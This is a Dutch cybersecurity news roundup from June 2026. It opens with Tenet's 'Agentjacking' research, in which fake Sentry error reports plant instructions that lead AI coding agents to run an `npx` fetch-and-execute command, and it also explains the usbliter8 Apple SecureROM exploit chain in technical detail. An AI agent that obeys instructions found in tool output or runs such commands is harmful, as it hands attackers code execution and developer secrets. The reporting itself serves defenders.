Onderzoekers van Tenet Threat Labs hebben een nieuwe aanvalstechniek gedemonstreerd, genaamd 'Agentjacking'. Deze methode toont aan hoe valse foutrapporten van Sentry, een populair platform voor applicatiemonitoring, AI-codeerassistenten kunnen misleiden om commando's uit te voeren op de machine van een ontwikkelaar. De techniek maakt misbruik van de manier waarop AI-codeerassistenten onbetrouwbare foutenlogboeken verwerken.

Volgens een blogpost van Tenet vereist Agentjacking geen gestolen wachtwoorden of directe toegang tot het interne netwerk van een bedrijf. In de gedemonstreerde aanvalsroute kan een aanvaller de openbare broncode van een website inspecteren om de Sentry Data Source Name (DSN) te vinden. Dit is een projectidentificatie die vaak opzettelijk wordt blootgesteld, zodat applicaties foutrapporten naar Sentry kunnen sturen.

Met een blootgestelde DSN kan een aanvaller een vals foutrapport indienen bij Sentry. Dit rapport maakt gebruik van Markdown-injectie om door de aanvaller gecontroleerde tekst te verbergen in de inhoud van het probleem. Als een ontwikkelaar vervolgens een AI-codeeragent vraagt om het probleem te onderzoeken via een Sentry MCP-server, kan de agent het valse rapport als context lezen en de geïnjecteerde instructies opvolgen.

Dit probleem is een vorm van instructie-injectie. Tenet's proof of concept toonde aan dat een AI-codeeragent de door de aanvaller geleverde probleemtekst als een betrouwbare instructie kan behandelen. In de test gaf een valse sectie met de titel "Resolution" de agent de opdracht om `npx @tenet-controlled-validation-package --diagnose` uit te voeren. Dit is een gecontroleerd npm-pakket dat door de onderzoekers werd gebruikt voor validatie. De commando downloadde en voerde het npm-pakket uit vanuit het openbare register, wat volgens de onderzoekers een pad naar uitvoering van code op afstand demonstreerde. Een kwaadaardig pakket zou met de lokale accountrechten van de ontwikkelaar kunnen worden uitgevoerd.

Tijdens een validatieperiode die eindigde op 17 juni 2026, identificeerden Tenet-onderzoekers 2.388 organisaties met blootgestelde Sentry DSN's. De Agentjacking-techniek werkte in geteste omgevingen met populaire AI-codeertools, waaronder Claude Code, Cursor en OpenAI Codex, op zowel Windows, macOS als in geautomatiseerde cloud-pipelines. Tenet waarschuwde tevens dat traditionele beveiligingstools, zoals endpointdetectie- en responsystemen en firewalls, moeite kunnen hebben om dit type aanval te detecteren, omdat de activiteit afkomstig lijkt te zijn van vertrouwde tools en geautoriseerde gebruikersacties. Tenet noemt dit de 'Authorized Intent Chain', waarbij de heersende beveiligingsmodellen zijn gebouwd om ongeautoriseerd gedrag te detecteren, terwijl deze aanval geen ongeautoriseerd gedrag bevat.

De onderzoekers rapporteerden dat AI-assistenten van meer dan 100 wereldwijde organisaties hun gecontroleerde validatiecode uitvoerden, waaronder een Fortune 100-technologiebedrijf met een waarde van ongeveer 250 miljard dollar. De resultaten tonen aan hoe Agentjacking kan worden misbruikt om ontwikkelaarsgeheimen, zoals AWS-sleutels, GitHub-tokens en SSH-sleutels, bloot te leggen bij gebruik van een kwaadaardig pakket.

Tenet Threat Labs meldde het probleem op 3 juni 2026 aan Sentry. Sentry reageerde door een contentfilter toe te voegen om de specifieke validatietekst te blokkeren die in de proof of concept werd gebruikt. Tenet merkte echter op dat een bredere platformbrede oplossing moeilijk is, omdat het kernprobleem ligt bij AI-agenten die onbetrouwbare tooluitvoer als instructies behandelen. Om ontwikkelaars te helpen de blootstelling te verminderen, heeft Tenet een gratis tool uitgebracht genaamd Agent-JackStop, ontworpen om Cursor en Claude Code te harden tegen instructie-injectie van onbetrouwbare gegevensbronnen.

 

Bron: Tenet Threat Labs | Bron 2: github.com | Bron 3: tenetsecurity.ai

19 juni 2026 | Grootschalig misbruik van kwetsbaarheid in WordPress-plug-in Gravity SMTP

Aanvallers maken op grote schaal misbruik van een kwetsbaarheid in de Gravity SMTP plug-in voor WordPress. Dit meldt cybersecuritybedrijf Wordfence. Via het beveiligingslek kunnen ongeauthenticeerde aanvallers gevoelige configuratiedata, API keys, secrets en OAuth tokens stelen. De Gravity SMTP plug-in wordt door WordPress-websites gebruikt voor het versturen van e-mail en draait naar schatting op ongeveer 100.000 websites.

De kern van het probleem ligt in een REST API endpoint dat zonder authenticatie toegankelijk is. Dit maakt het mogelijk om diverse configuratiegegevens en vertrouwelijke data op te vragen. Het betreft onder meer tokens die worden gebruikt voor de integratie met e-maildiensten zoals Amazon SES, Google, Mailjet, Resend en Zoho. Door deze tokens te bemachtigen, kunnen aanvallers e-mails versturen uit naam van de getroffen website. Bovendien kunnen zij informatie verzamelen over de software stack van de website, wat kan worden ingezet voor verdere, gerichte aanvallen.

De ontwikkelaar van de plug-in heeft op 17 maart een update uitgebracht om het probleem te verhelpen. Desondanks constateert Wordfence dat aanvallers sinds 5 mei actief misbruik maken van de kwetsbaarheid. Sinds die datum heeft het cybersecuritybedrijf meer dan zeventien miljoen aanvalspogingen geregistreerd. Het is onbekend hoeveel van de websites die de Gravity SMTP plug-in gebruiken de beschikbare update nog niet hebben geïnstalleerd en daardoor kwetsbaar blijven.

 

Bron: Wordfence

20 juni 2026 | Unit 42 waarschuwt voor grootschalige aanval op Fortinet, Sophos en MSSQL

Het Unit 42 Threat Research Center van Palo Alto Networks heeft een grootschalige campagne voor wachtwoordkraken en het stelen van inloggegevens geïdentificeerd, genaamd "FortiBleed". De aanvallers richten zich voornamelijk op apparaten van Fortinet en MSSQL, en er zijn tevens meldingen van aanvallen op Sophos-apparaten. Hoewel deze activiteit niet gericht is op apparaten van Palo Alto Networks, heeft Unit 42 verdachte inlogpogingen waargenomen in de telemetrie van klanten en brengt het dit rapport uit om organisaties te voorzien van de laatste inlichtingen en productaanbevelingen.

De dreigingsactoren maken gebruik van een samengestelde lijst van wachtwoorden om wachtwoorden te kraken op diensten die zijn blootgesteld aan het internet. Unit 42 schat in dat de initiële wachtwoordenlijst voor deze campagne waarschijnlijk is samengesteld uit eerdere datalekken en succesvolle exploitatie van kwetsbaarheden. Zodra de aanvallers inloggegevens bemachtigen, voegen ze deze toe aan hun lijst voor toekomstige pogingen tegen andere doelwitten, en om in te loggen op reeds gecompromitteerde accounts.

De aanval volgt een meerstappenproces om persistente toegang met hoge privileges te verkrijgen:

1.  **Wachtwoordkraken voor initiële toegang**: Er vinden massale scans over het internet plaats, gevolgd door wachtwoordkraken op Fortinet, Sophos en MSSQL-diensten.

2.  **Extractie van configuratie**: Afhankelijk van de machtigingen van de initiële toegang, kunnen de aanvallers een kwetsbaarheid voor privilege-escalatie misbruiken voordat ze configuratiebestanden van apparaten extraheren, inclusief opgeslagen inloggegevens.

3.  **Offline kraken**: Het offline kraken van de gestolen inloggegevens vult de wachtwoordenlijst aan die in de eerste stap wordt gebruikt om nieuwe apparaten aan te vallen, en om in te loggen op gecompromitteerde apparaten om persistentie als beheerder te verkrijgen.

Op 16 juni 2026 claimde een initial access broker (IAB) op het Russischtalige cybercrime forum Exploit[.]in de verantwoordelijkheid voor deze campagne. De IAB refereerde aan een CVE (zonder verdere informatie) en bood de verzamelde inloggegevens te koop aan. Unit 42 heeft deze claims op dit moment niet gevalideerd. Het initiële rapport over het richten op FortiGate-apparaten werd geleverd door SOCRadar.

Unit 42 adviseert om logs van externe toegang te controleren op verdachte activiteiten, met een focus op succesvolle inlogpogingen kort na grootschalige gebeurtenissen met mislukte wachtwoorden. Daarnaast wordt aanbevolen om de onderstaande verhardingsrichtlijnen voor randapparatuur te bekijken en te implementeren.

 

Bron: Unit 42 | Bron 2: mastodon.social | Bron 3: socradar.io

20 juni 2026 | Klue bevestigt datalek na aanval door groep Icarus

Het platform voor marktinformatie Klue heeft recentelijk een beveiligingsincident bevestigd, waarbij aanvallers OAuth-tokens hebben gestolen die werden gebruikt om verbinding te maken met Salesforce-omgevingen van klanten. De nieuwe afpersingsgroep "Icarus" heeft de verantwoordelijkheid voor de aanval publiekelijk opgeëist. Deze onthulling volgt op gedetailleerde rapporten van cybersecuritybedrijven Huntress en ReliaQuest, die beschreven hoe aanvallers misbruik maakten van gecompromitteerde Klue Battlecards-integraties om Salesforce CRM-gegevens te stelen van diverse organisaties.

Jason Smith, CEO van Klue, verklaarde deze week in een verklaring dat het bedrijf op 12 juni onbevoegde activiteiten ontdekte die een deel van Klue's integratie-infrastructuur troffen. Klue heeft sindsdien samengewerkt met cybersecurity-experts om de oorzaak te achterhalen, klanten te ondersteunen en de getroffen verbindingen te herstellen. Uit het onderzoek bleek dat een aanvaller toegang verkreeg via een gecompromitteerde verouderde inloggegevens die gekoppeld waren aan een integratieservice. De aanvaller gebruikte deze toegang om OAuth-tokens te bemachtigen, die nodig zijn om Klue te verbinden met specifieke externe platforms, waaronder Salesforce. Vervolgens hebben de aanvallers toegang verkregen tot gegevens binnen een aantal gekoppelde klantomgevingen.

Klue heeft aangegeven dat er momenteel geen bewijs is dat klantcontent die direct binnen het Klue-platform is opgeslagen, is getroffen. Het incident bleef beperkt tot de integraties met externe partijen. Het bedrijf heeft onmiddellijk de getroffen inloggegevens en tokens ingetrokken, ongeautoriseerde code verwijderd, de getroffen integraties uitgeschakeld, een onderzoek gestart en de wetshandhavingsinstanties op de hoogte gesteld. Klue heeft tevens CrowdStrike ingeschakeld om te assisteren bij de respons op het incident.

ReliaQuest en Huntress constateerden dat de aanvallers gestolen OAuth-inloggegevens, gekoppeld aan Klue-integraties, gebruikten om toegang te krijgen tot Salesforce-omgevingen van klanten en grootschalige data te stelen. ReliaQuest observeerde hoe aanvallers OAuth-tokens genereerden en Python-scripts inzetten om gedurende langere perioden Salesforce’s API te bevragen, terwijl gegevens werden ontvreemd. Huntress onthulde later dat hun eigen Salesforce-omgeving door de Klue-inbraak was getroffen en dat de gestolen gegevens onder meer zakelijke contacten, verkoopcommunicatie, prijsinformatie en andere dossiers omvatten.

De groep Icarus heeft intussen publiekelijk de verantwoordelijkheid voor de aanval opgeëist op hun data lek site. Zij stelden dat Klue.com recentelijk door hen is getroffen en dat verschillende Salesforce-instanties van Klue-partners zijn geëxfiltreerd. De dreigingsactoren oefenen druk uit op Klue en de getroffen organisaties om contact met hen op te nemen via het Session-messagingplatform om het lekken van gestolen gegevens te voorkomen.

Verschillende andere slachtoffers hebben intussen gemeld dat zij door de aanvallen zijn getroffen, waaronder Recorded Future, Tanium, Jamf, Sprout Social en Gong. Vrijwel alle getroffen partijen bevestigen dat het incident leidde tot diefstal van gegevens uit hun Salesforce-instanties, maar dat hun eigen platforms, infrastructuur, betalingsinformatie of interne systemen niet zijn aangetast. Diverse organisaties waarschuwden dat de gestolen zakelijke contactinformatie kan worden misbruikt voor verdere phishing, social engineering en afpersingscampagnes, en drongen er bij klanten op aan waakzaam te zijn.

 

Bron: Klue | Bron 2: huntress.com | Bron 3: reliaquest.com

20 juni 2026 | Update over FortiBleed: grootschalig kraken en doorverkopen Fortinet inloggegevens

Recente analyses werpen nieuw licht op de "FortiBleed"-campagne, waarbij inloggegevens van Fortinet firewalls op grote schaal zijn buitgemaakt en te koop worden aangeboden. Kevin Beaumont, een bekend cybersecurity onderzoeker, heeft een update gepubliceerd over de situatie, inclusief inzichten verkregen uit de logs van getroffen organisaties. Fortinet had eerder aan media verklaard dat de gelekte gegevens afkomstig waren van eerdere inbraken en bruteforcing, maar deze verklaring blijkt niet het volledige verhaal te zijn.

De aanvallers maakten een significante fout door delen van hun aanvalsinfrastructuur, waaronder een open directory, toegankelijk te laten op IP-adres 85.11.187.8 op poort 9999. Dit bood waardevol bewijs over hun werkwijze. De aanval begon met het scannen van het internet om kwetsbare Fortigate apparaten te identificeren. Vervolgens logden de aanvallers in, waarschijnlijk door misbruik te maken van onbeveiligde kwetsbaarheden of reeds bestaande 'slapende' beheerdersaccounts die als backdoors fungeerden. Daarna exporteerden zij de volledige configuratiebestanden van de Fortigate apparaten.

Offline werden de geëxporteerde configuraties gebruikt om wachtwoordhashes te kraken en zo de plain text wachtwoorden van alle gebruikers op het apparaat te achterhalen. Voor dit kraakproces maakten de aanvallers gebruik van de rekenkracht van een GenAI bedrijf, waar zij 36 enterprise-klasse grafische verwerkingseenheden (GPU's) huurden. Deze GPU's stelden hen in staat om op grote schaal wachtwoorden te kraken. Het gemak waarmee dergelijke krachtige rekenclusters nu on-demand gehuurd kunnen worden, onderstreept een groeiende dreiging voor de beveiliging van traditioneel versleutelde wachtwoorden.

Hoewel een eerder rapport van CloudSEK suggereerde dat ongeveer duizend organisaties intern waren gecompromitteerd, benadrukt Beaumont dat de aanvallers inlogpogingen op grote schaal uitvoerden en configuratie-exports verrichtten bij tienduizenden Fortigate apparaten. De gestolen inloggegevens, waaronder die voor FortiVPN cliënten, worden momenteel online op forums te koop aangeboden, wat de weg opent voor verdere inbraken. Bovendien bleek uit onderzoek dat een aanzienlijk aantal Fortigate klanten reeds in het bezit was van 'slapende' beheerdersaccounts, die in het verleden mogelijk door andere ransomwaregroepen zijn gecreëerd en nu als backdoors kunnen dienen voor toekomstige aanvallen.

 

Bron: Kevin Beaumont | Bron 2: cloudsek.com | Bron 3: owned.lab6.com

20 juni 2026 | Onherstelbare 'usbliter8' exploit bedreigt Apple A12 en A13 SecureROM

Beveiligingsonderzoekers van Paradigm Shift hebben een werkende exploit, genaamd usbliter8, gepubliceerd die willekeurige code-uitvoering mogelijk maakt binnen de SecureROM van Apple's A12- en A13-chips. Deze code is bij de fabricage in het silicium gebrand, wat betekent dat geen enkele software-update de kwetsbaarheid kan verhelpen. Getroffen apparaten zullen deze fout behouden zolang ze in gebruik zijn.

Het betreft geen aanval op afstand. De exploit vereist fysiek bezit van het apparaat, dat in DFU-modus moet zijn en via USB moet zijn verbonden met een speciaal op RP2350 gebaseerd microcontrollerkaart. Met deze opstelling is de exploit binnen twee seconden voltooid, voordat Apple's ondertekende bootketen wordt geladen. Een volledige technische beschrijving en een werkende proof-of-concept zijn op 18 juni 2026 openbaar gemaakt, na gecoördineerde openbaarmaking met Apple Product Security.

De openbare proof-of-concept ondersteunt A12-, A13-, S4- en S5-systemen op een chip (SoC's). Ondersteuning voor A12X en A12Z wordt theoretisch mogelijk geacht, maar is nog niet geïmplementeerd. Apparaten met deze chips omvatten de iPhone XS, XS Max en XR; de iPhone 11, 11 Pro, 11 Pro Max; de iPhone SE (2e generatie); de iPad Air (3e generatie), iPad mini (5e generatie) en iPad (8e generatie); Apple Watch Series 4 en 5; de eerste generatie Apple Watch SE; de HomePod mini; en andere Apple-producten die op deze chips zijn gebouwd. De A11-chip is niet getroffen, en A14 en latere chips lijken buiten bereik van dit exploitpad te liggen.

De kern van het probleem is een hardwarefout in de Synopsys DWC2 USB-controller. Deze controller slaat inkomende USB setup-pakketten op via DMA, buffert er maximaal drie, en reset vervolgens zijn schrijfpointer op het vierde pakket door deze met een vaste waarde van 24 bytes te verminderen. De controller accepteert ook pakketten die kleiner zijn dan de standaard, waarbij de pointer alleen wordt verhoogd met het aantal daadwerkelijk geschreven bytes. Deze mismatch leidt tot een herhaalbare buffer-underflow, waarbij de schrijfpointer telkens 12 bytes terug door het geheugen beweegt.

Wat dit exploiteerbaar maakt op A12 en A13, is hoe Apple de USB DART (Device Address Resolution Table, de IOMMU van de chip) configureert binnen SecureROM. Op getroffen apparaten draait DART in bypassmodus, waardoor de underflowing DMA-pointer willekeurig SRAM kan bereiken en overschrijven. De A11-chip is niet getroffen omdat het USB-stuurprogramma na elk pakket handmatig het DMA-adres reset, waardoor de mismatch zich nooit ophoopt. A14 en latere chips lijken DART correct te configureren, wat de kwetsbaarheid op nieuwere hardware onexploiteerbaar maakt volgens Paradigm Shift.

Om code-uitvoering te verkrijgen op A12, bevindt de DMA-buffer zich naast de stack van de USB-taak op de heap. Het overschrijven van een opgeslagen linkregister geeft de aanvaller controle over de programmateller bij de volgende contextwissel. Op A13 is dit complexer vanwege Pointer Authentication (PAC) dat op de stack opgeslagen retouradressen beschermt. Paradigm Shift omzeilde dit in fasen: het corrumperen van DART-gerelateerde heap-structuren creëerde beperkte schrijfprimitieven, het overschrijven van de paniek-diepteteller zorgde ervoor dat de chip bij fouten bleef loopen in plaats van opnieuw op te starten, en zorgvuldige DMA-schrijftiming voorkwam het overschrijven van de opgeslagen registers van de USB-taak. De laatste stap was het overschrijven van de pointer van de USB-interrupt-handler in BSS. De volgende USB-interrupt voerde vervolgens de door de aanvaller geleverde code uit. Beide paden resulteren in uitvoering op EL1, de geprivilegieerde modus van de chip, binnen SecureROM.

Na de exploitatie injecteert usbliter8 een aangepaste USB-verzoekhandler en stempelt "PWND:[usbliter8]" in de USB-seriële string van het apparaat. Vanaf dat punt kan een aanvaller tijdelijk de productiemodus van de SoC downgraden of een onbewerkt, onondertekend iBoot-image opstarten zonder handtekeningcontroles, waardoor Apple's vertrouwensketen volledig wordt omzeild. Het onderzoek toont geen compromittering van de Secure Enclave. Apple's Secure Enclave is ontworpen als een aparte beschermingsgrens, geïsoleerd van de applicatieprocessor. Paradigm Shift waarschuwt echter dat controle op BootROM-niveau nieuwe routes kan openen voor het aanvallen ervan.

Het dichtstbijzijnde publieke precedent is checkm8, de SecureROM-exploit uit 2019 die A5- tot en met A11-apparaten permanent buiten Apple's patchbevoegdheid plaatste. Net als checkm8 vereist usbliter8 fysieke toegang en DFU-modus en kan het niet worden gesloten met een firmware-update. usbliter8 breidt deze conditie uit naar de volgende chipgeneratie.

Op 19 juni 2026 was er nog geen CVE, CVSS-score, Apple-beveiligingsadvies of CISA-waarschuwing uitgegeven, en was er geen exploitatie in het wild publiekelijk gemeld. Voor de meeste gebruikers is het praktische risico laag: een aanvaller heeft het fysieke apparaat, de juiste kabel en de kennis nodig om de DFU-modus te forceren. Voor omgevingen met hoge beveiliging is dit nu een probleem van hardware-uitfasering en apparaatbeheer. Als een apparaat een van de getroffen chips bevat, is de fysieke grens permanent verdwenen; de veiligheid hangt af van het controleren wanneer en waar het apparaat kan worden aangesloten. Organisaties dienen A12, A13, S4 en S5 hardware in gevoelige rollen te inventariseren, te prioriteren naar A14 of nieuwer, en DFU-modus via onbetrouwbare USB-kabels of -hosts te vermijden. De code is openbaar, wat vaak betekent dat dergelijk onderzoek van een demonstratie evolueert naar een tool voor anderen.

 

Bron: Apple | Bron 2: github.com

20 juni 2026 | Rocket.Chat migreert van EOL Node.js runtime dankzij Meteor 3.0

Rocket.Chat, een communicatieplatform dat wordt ingezet in gevoelige federale overheidsomgevingen, heeft succesvol de migratie afgerond van de end-of-life (EOL) Node.js 14 runtime naar een ondersteunde versie. Deze cruciale stap werd mogelijk gemaakt door de release van Meteor 3.0, het framework waarop Rocket.Chat is gebouwd. De overstap adresseert een structureel risico in de toeleveringsketen dat niet altijd wordt gedetecteerd door traditionele kwetsbaarheidsbeheersystemen.

Node.js 14 bereikte zijn EOL op 30 april 2023, wat betekende dat veel applicaties, waaronder die gebouwd met Meteor, op een onondersteunde runtime draaiden. Rodrigo Nascimento, CTO van Rocket.Chat, gaf aan dat een overstap naar een ondersteunde Node.js-versie pas kon plaatsvinden na de lancering van Meteor 3.0, aangezien het framework een blokkade vormde.

De kern van het technische probleem lag bij de `node-fibers` bibliotheek. Meteor vertrouwde op deze bibliotheek om asynchrone code synchroon te laten gedragen, een oplossing die later een structurele aansprakelijkheid werd. Toen Node.js 16 werd uitgebracht, werkte `node-fibers` niet meer. Dit vereiste een fundamentele verandering van het programmeermodel voor elke Meteor-applicatie die wilde upgraden: `Fibers` moest worden verwijderd en de code moest worden omgebouwd rond native `async/await`. Dit was geen eenvoudige patch, maar een ingrijpende architecturale wijziging.

De kloof tussen de identificatie van het probleem in juni 2021 en de voltooiing van de migratie duurde jaren. Meteor Software, het bedrijf achter Meteor.js en het Galaxy hostingplatform, onderging in 2022 een herstructurering en kreeg nieuw leiderschap. Henrique Schmaiske, de eerste technische aanwinst onder de nieuwe CEO, speelde een cruciale rol als een van de drie kernbijdragers die Meteor 3.0 tot een succesvolle release brachten.

Het team van Meteor Software koos voor een gefaseerde migratie in plaats van één grote, ingrijpende release. Versies 2.8 en 2.9 introduceerden asynchrone varianten van belangrijke componenten, zoals `Meteor.callAsync`, een herziene MongoDB API, OAuth en `accounts-password`, nog voordat `Fibers` definitief werd verwijderd. Dit gaf downstream-teams, waaronder Rocket.Chat, de tijd om zich voor te bereiden. In maart 2023 publiceerde Meteor een openbare roadmap voor de "Fibers Public Roadmap en Meteor 3.0", met wekelijkse updates gedurende de daaropvolgende twee jaar. Dit was van groot belang, omdat organisaties met eigen beveiligings-, compliance- en upgradetijdlijnen inzicht nodig hadden in de voortgang van de migratie.

Meteor 3.0 werd op 16 juli 2024 gelanceerd. De ontwikkeling omvatte meer dan 2.300 commits, 800 gewijzigde bestanden en 200 pull requests. De `node-fibers` bibliotheek werd verwijderd, de codebase schakelde over op native `async/await`, Connect maakte plaats voor Express, en de release bracht ondersteuning voor Node.js 20.

Schmaiske werkte direct samen met het engineeringteam van Rocket.Chat tijdens de migratie. Rocket.Chat 7.0.0, uitgebracht op 1 november 2024, bevestigde de overstap naar Node.js 20.x en Meteor 3.0. Voor een platform dat wordt gebruikt in gevoelige omgevingen, zoals die van het Amerikaanse Ministerie van Defensie, was dit meer dan een routineuze versie-update; het bracht de runtime terug op een ondersteunde en veilige basis.

Hoewel er geen aanwijzingen zijn dat de periode van de onondersteunde runtime werd misbruikt tegen Rocket.Chat, benadrukt dit incident een categorie van risico in de toeleveringsketen die niet altijd wordt opgemerkt door standaard kwetsbaarheidsbeheer. Er werd geen CVE ingediend en er was geen exploit in omloop. De blootstelling was structureel: een onondersteunde runtime onder een breed ecosysteem, inclusief software die wordt gebruikt in omgevingen met strenge beveiligings- en compliance-eisen.

De belangrijkste les is dat modernisering van frameworks verder gaat dan ontwikkelaarsgemak. In grote open-source ecosystemen kan de kloof tussen een gedocumenteerd probleem en een voltooide oplossing veel downstream-gebruikers beïnvloeden. EOL-datums leiden niet altijd tot onmiddellijke actie, en de gevolgen verschuiven dan naar downstream-gebruikers. De succesvolle aanpak van Meteor 3.0, met een openbare roadmap, gefaseerd migratiepad, wekelijkse voortgangsupdates en directe coördinatie met de meest waarschijnlijke getroffen teams, kan dienen als model voor open-source projecten om EOL-afhankelijkheden te behandelen als een risico in de toeleveringsketen voordat ze escaleren tot een incident.

 

Bron: Meteor Software | Bron 2: github.com

20 juni 2026 | Microsoft waarschuwt voor crypto clipper die zich via usb-sticks verspreidt

Het Microsoft Defender Security Research Team heeft een nieuwe crypto clipper ontdekt die zich als een worm verspreidt via usb-sticks en andere verwisselbare media. De malware, door Microsoft gedetecteerd als Trojan:Win32/CryptoBandits.A, kopieert zichzelf naar aangesloten usb-opslag met kwaadaardige snelkoppelingsbestanden (.lnk), waarmee het zich van het ene systeem naar het andere verplaatst. Voor de communicatie met de aanvallers gebruikt de malware het Tor netwerk, wat de aansturingsservers verbergt en opsporing bemoeilijkt.

Crypto clippers zijn erop gericht cryptovaluta te stelen door transacties om te leiden, waarbij het adres van de cryptoportemonnee in het klembord wordt vervangen door dat van de aanvaller. Microsoft benadrukt dat deze variant zich niet over netwerken verspreidt, maar specifiek via verwisselbare media. Dat levert vooral risico op in omgevingen waar het gebruik van usb-apparaten niet streng wordt beheerd.

Naast de verspreiding richt de crypto clipper zich op persistentie. Eenmaal geïnfecteerd installeert de malware mechanismen om zichzelf te handhaven, zelfs na een herstart van het systeem of pogingen om de malware te verwijderen. Dit maakt het voor slachtoffers extra moeilijk om de infectie volledig te elimineren.

Microsoft adviseert organisaties om het gebruik van verwisselbare media te beperken, aangesloten usb-apparaten te scannen en verdacht verkeer richting het Tor netwerk te monitoren. De combinatie van verspreiding via usb-sticks en verborgen communicatie via Tor maakt deze dreiging lastiger te detecteren en te bestrijden.

 

Bron: Microsoft | Bron 2: itdaily.com

20 juni 2026 | Safeonweb waarschuwt voor phishing rond belastingaangiften

Safeonweb waarschuwt burgers in België om extra waakzaam te zijn voor frauduleuze berichten die inspelen op de actualiteit van de belastingaangiften. Oplichters maken gebruik van de periode waarin belastingaangiften moeten worden ingediend om slachtoffers in de val te lokken. Er circuleren e-mails en sms-berichten die afkomstig lijken te zijn van officiële instanties zoals de Federale Overheidsdienst (FOD) Financiën, My eBox of de Vlaamse overheid. Deze berichten vragen de ontvangers om ontbrekende gegevens aan te vullen of beloven eventuele terugbetalingen.

Een veelvoorkomend voorbeeld van zo’n bericht is een e-mail met de tekst: "Er ontbreken nog enkele gegevens in je belastingaangifte voor 2025". De oplichters dringen vaak aan op een snelle reactie en benadrukken een deadline, zoals 30 juni, om een gevoel van urgentie te creëren.

Om dergelijke oplichting te herkennen, zijn er enkele duidelijke signalen. Ten eerste bevatten de frauduleuze berichten vaak een link naar een pagina waar "gegevens aangevuld" moeten worden. Bij nauwkeurige inspectie van de URL van deze link blijkt echter dat deze niet naar de officiële website van de FOD Financiën leidt. Ten tweede kan het e-mailadres van de afzender er vreemd uitzien of kleine afwijkingen bevatten, zoals overtollige letters, spelfouten of ongebruikelijke tekens.

Safeonweb raadt aan om de volgende tips te volgen om niet in de val te trappen:

Open My eBox of My Minfin altijd via een link die u zelf in de browser invoert, in plaats van te klikken op een link in een verdachte e-mail of sms. Officiële instanties sturen documenten altijd via hun beveiligde platforms en niet zomaar via e-mail of sms. Controleer de afzender van een e-mail door met de muiscursor over de naam te gaan; zo wordt het daadwerkelijk gebruikte e-mailadres zichtbaar. Wees op uw hoede voor verdachte adressen. Op dezelfde manier kunt u de URL controleren waarnaar een link verwijst; op een smartphone of tablet houdt u de vinger op de link ingedrukt om de URL te zien verschijnen.

Voor meer informatie over het herkennen van frauduleuze berichten kunnen burgers terecht op surfenzonderzorgen.safeonweb.be. Indien er al geld is gestolen, adviseert Safeonweb snel actie te ondernemen en het advies op https://safeonweb.be/nl/opgelicht te volgen.

 

Bron: Safeonweb | Bron 2: myebox.be | Bron 3: minfin.fgov.be

20 juni 2026 | Nieuwe phishing technieken omzeilen multi-factor authenticatie

Aanvallers maken in toenemende mate gebruik van geavanceerde phishing technieken die multi-factor authenticatie (MFA) omzeilen, waardoor traditionele beveiligingsmaatregelen minder effectief zijn. Dit vormt een groeiende uitdaging voor organisaties die MFA als een van hun sterkste verdedigingslinies beschouwen tegen accountcompromittering.

Een opkomende techniek die veel aandacht krijgt, is 'Device Code phishing'. Bij deze methode worden gebruikers misleid om toegang te autoriseren via legitieme Microsoft authenticatiepagina's. Doordat gebruikers een echte login en MFA-uitdaging voltooien, kunnen aanvallers persistente toegang verkrijgen zonder ooit in het bezit te komen van de daadwerkelijke inloggegevens. Deze aanpak verschilt van traditionele phishing die gericht is op het stelen van wachtwoorden.

Moderne phishingcampagnes, business email compromise (BEC) en accountovername (ATO) aanvallen exploiteren vertrouwde diensten en authenticatieworkflows om toegang te krijgen tot zakelijke accounts. Het probleem hierbij is dat traditionele e-mailverdediging, credential monitoring en MFA-beschermingen deze aanvallen vaak niet detecteren. Dit dwingt beveiligingsanalisten om verdachte activiteiten pas te onderzoeken nadat een account al is gecompromitteerd.

Op 8 juli 2026 zal een webinar, gehost door BleepingComputer, dieper ingaan op deze ontwikkelingen. Dan Nickolaisen, Solutions Architect Manager bij Abnormal AI, en Eric Danneker, Director of Cyber Vigilance and Defense bij Novant Health, zullen bespreken hoe organisaties deze aanvallen eerder kunnen identificeren. De focus ligt op het gebruik van gedragsmatige AI om ongebruikelijke accountactiviteit, verdachte communicatie en aanvalspatronen te herkennen die conventionele beveiligingscontroles mogelijk missen.

Deelnemers aan de webinar zullen praktische benaderingen leren voor het eerder detecteren van gecompromitteerde accounts, het verminderen van de onderzoekslast en het verbeteren van de reactietijden door middel van automatisering en gedragsanalyse. Dit alles om te voorkomen dat gecompromitteerde accounts leiden tot grotere beveiligingsincidenten.

 

Bron: Abnormal AI | Bron 2: event.on24.com

20 juni 2026 | Duitse overheid waarschuwt vakantiegangers voor openbare wifi en usb-opladers

In aanloop naar de zomervakantie heeft de Duitse overheid, via het Bundesamt für Sicherheit in der Informationstechnik (BSI), digitale beveiligingstips voor vakantiegangers gepubliceerd. Deze waarschuwingen omvatten adviezen over het voorzichtig omgaan met openbare wifi netwerken en het vermijden van onbekende usb oplaadstations. Hoewel dergelijke tips jaarlijks door diverse overheidsinstanties worden uitgegeven, is er al geruime tijd kritiek van experts en organisaties op de vermeende urgentie van sommige van deze risico's.

Het BSI, dat deel uitmaakt van het Duitse ministerie van Binnenlandse Zaken, benadrukt dat openbare usb oplaadstations en onbekende oplaadkabels gebruikt kunnen worden voor het versturen van data. Dit fenomeen staat bekend als 'juice jacking'. Het advies luidt dan ook om uitsluitend eigen opladers en kabels te gebruiken. Desondanks zijn er geen concrete voorbeelden bekend van aanvallen via juice jacking die daadwerkelijk in de praktijk hebben plaatsgevonden. De Amerikaanse burgerrechtenbeweging EFF heeft dergelijke waarschuwingen in het verleden reeds als 'bangmakerij' bestempeld.

Ook het advies om voorzichtig te zijn met openbare wifi netwerken en daarbij een Virtual Private Network (VPN) te gebruiken voor extra beveiliging, is een punt van discussie. De EFF heeft eerder aangegeven dat de meeste websites tegenwoordig gebruikmaken van HTTPS, wat het afluisteren van internetverkeer effectief voorkomt. Echter, in december van het voorgaande jaar werd een 44-jarige Australische man veroordeeld tot een gevangenisstraf van zeven jaar en vier maanden, specifiek voor het uitvoeren van phishingaanvallen via een 'evil twin' wifi netwerk. Dit incident toont aan dat, ondanks de prevalentie van HTTPS, bepaalde wifi gerelateerde dreigingen nog steeds reëel zijn.

Verder adviseert het BSI vakantiegangers om reisdocumenten alleen via vertrouwde kanalen op te vragen. Ook wordt aangeraden terughoudend te zijn met het delen van persoonlijke informatie. Dit betreft onder meer het plaatsen van vakantiefoto's met locatiegegevens op sociale media, het gebruik van out-of-office replies, en het belang van het instellen van schermvergrendeling op mobiele apparaten. Tot slot benadrukt het BSI de noodzaak om accounts vóór vertrek te beveiligen met tweefactorauthenticatie (2FA), om zo de algehele digitale veiligheid tijdens de vakantie te vergroten.

 

Bron: BSI | Bron 2: grapheneos.org

